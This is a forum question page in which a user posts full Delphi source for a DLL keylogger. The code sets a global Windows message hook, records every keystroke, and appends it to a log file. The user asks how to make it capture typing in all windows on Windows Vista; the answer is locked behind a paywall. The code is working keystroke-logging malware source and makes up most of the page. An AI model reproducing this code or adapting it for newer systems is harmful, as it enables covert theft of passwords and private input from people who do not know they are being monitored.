troubleshooting Question

Advanced keylogger running on Windows Vista

Avatar of dinamicart
dinamicart asked on
DelphiSecurityEditors IDEs
3 Comments1 Solution755 ViewsLast Modified:
I used the following program to capture any keystrokes and log them to a file. It works great on Windows XP but on Windows Vista I was unable to use it (it logs only the charachers typed in the form where I set StartTheHook procedure, when I switch the windows does not log anything). Can someone give me a hint about how can I modify this code to work with Windows Vista?

Thank you!
library TheHook;
 
uses
  Windows,
  Messages,
  SysUtils;
 
var
  TheHookHandle: HHOOK;
  FF: TextFile;
  FileName: string;
 
function TheHookProc(Code : integer; wParam : DWORD; lParam : DWORD): longint; stdcall;
var
  LogText: string;
  KeyState: TKeyBoardState;
  VirtualKey: byte;
  ScanCode: byte;
  AChar: array[0..1] of Char;
  buf: string;
begin
  result := 0;
  if (Code = HC_ACTION) then begin
    if (tagMSG(Ptr(lParam)^).Message = WM_KEYUP) or (tagMSG(Ptr(lParam)^).Message = WM_KEYDOWN) then begin
      // record UP/DOWN state
      if (tagMSG(Ptr(lParam)^).Message = WM_KEYUP) then LogText := 'KEYUP   '
      else LogText := 'KEYDOWN ';
     
      // translate the key to ASCII
      GetKeyboardState(KeyState);
      VirtualKey := tagMSG(Ptr(lParam)^).WParam;
      ScanCode := HIBYTE(LOWORD(tagMSG(Ptr(lParam)^).lParam));
      ToAscii(VirtualKey, ScanCode, KeyState, AChar, 0);
 
      // exceptions
      case VirtualKey of
        VK_BACK: buf := 'Backspace';
        VK_DELETE: buf := 'Delete';
        VK_TAB: buf := 'Tab';
        VK_RETURN: buf := 'Enter';
        VK_SHIFT: buf := 'Shift';
        VK_CAPITAL: buf := 'CapsLock';
        VK_ESCAPE: buf := 'Esc';
        VK_SPACE: buf := 'Space';
        // etc. keys you're interested in
      else
        buf := AChar[0];
      end;
 
      LogText := LogText + buf;
 
      // open the log file
      FileName := 'c:\log.txt'; // your log filename here
      AssignFile(FF, FileName);
      if FileExists(FileName) then Append(FF)
      else Rewrite(FF);
 
      // write to the log
      WriteLn(FF, LogText);
 
      // close the log file
      CloseFile(FF);
    end;
  end;
  {Call the next hook in the hook chain}
  if (Code < 0) then
    result := CallNextHookEx(TheHookHandle, Code, wParam, lParam);
end;
 
procedure StartTheHook; stdcall;
begin
  if (TheHookHandle = 0) then begin
 
    // set the hook
    TheHookHandle := SetWindowsHookEx(WH_GETMESSAGE, @TheHookProc, hInstance, 0);
  end;
end;
 
procedure StopTheHook; stdcall;
begin
  if (TheHookHandle <> 0) then begin
    // Remove our hook and clear our hook handle
    if (UnhookWindowsHookEx(TheHookHandle) <> FALSE) then begin
      TheHookHandle := 0;
    end;
 
  end;
end;
 
exports
  StartTheHook,
  StopTheHook;
 
begin
end.
Join the community to see this answer!
Join our exclusive community to see this answer & millions of others.
Unlock 1 Answer and 3 Comments.
Join the Community
Learn from the best

Network and collaborate with thousands of CTOs, CISOs, and IT Pros rooting for you and your success.

Andrew Hancock - VMware vExpert
See if this solution works for you by signing up for a 7 day free trial.
Unlock 1 Answer and 3 Comments.
Try for 7 days

”The time we save is the biggest benefit of E-E to our team. What could take multiple guys 2 hours or more each to find is accessed in around 15 minutes on Experts Exchange.

-Mike Kapnisakis, Warner Bros